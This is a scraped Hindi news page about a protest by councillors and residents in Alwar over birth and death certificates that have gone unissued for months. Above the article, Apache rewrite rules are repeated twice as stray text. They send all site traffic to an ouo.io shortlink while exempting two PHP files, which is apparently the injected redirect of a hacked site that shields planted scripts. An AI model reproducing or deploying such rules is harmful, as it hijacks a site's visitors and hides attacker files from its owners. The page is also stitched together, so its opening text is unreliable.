
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 647
Previous Nextअलवर। अलवर नगर परिषद में जन्म-मृत्यु प्रमाण पत्र नहीं बनने को लेकर आक्रोशित लोगों और कांग्रेस के पार्षदों ने शुक्रवार को प्रदर्शन किया और नगर परिषद सभापति का घेराव किया। नगर परिषद में पिछले चार महीनों से जन्म मृत्यु प्रमाण पत्र नहीं बन पा रहे हैं। जन्म-मृत्यु प्रमाण पत्र बनवाने आए लोगों को स्वयं ही अपने फार्म ढूंढना पड़ रहे हैं। इसके कारण आम आदमी को काफी परेशानी का सामना करना पड़ रहा है।
जन्म-मृत्यु प्रमाण ना बनने को लेकर कांग्रेस पार्षदों ने नगर परिषद में जमकर हंगामा किया और सभापति का घेराव किया। नगर परिषद नेता प्रतिपक्ष नरेंद्र मीणा ने बताया कि पिछले तीन चार महीनों से नगर परिषद में जन्म मृत्यु प्रमाण पत्र पेंडिंग पड़े हैं। लगभग साढ़े तीन हजार फॉर्म पड़े हैं। नगर परिषद सभापति और अन्य कर्मचारी जन्म-मृत्यु प्रमाण पत्र ना बनने का कारण सर्वर डाउन होना बता देते हैं। इससे आम आदमी काफी परेशानी में है. अभी बच्चों के एडमिशन का टाइम है, लेकिन परिषद प्रशासन ध्यान नहीं दे रहा।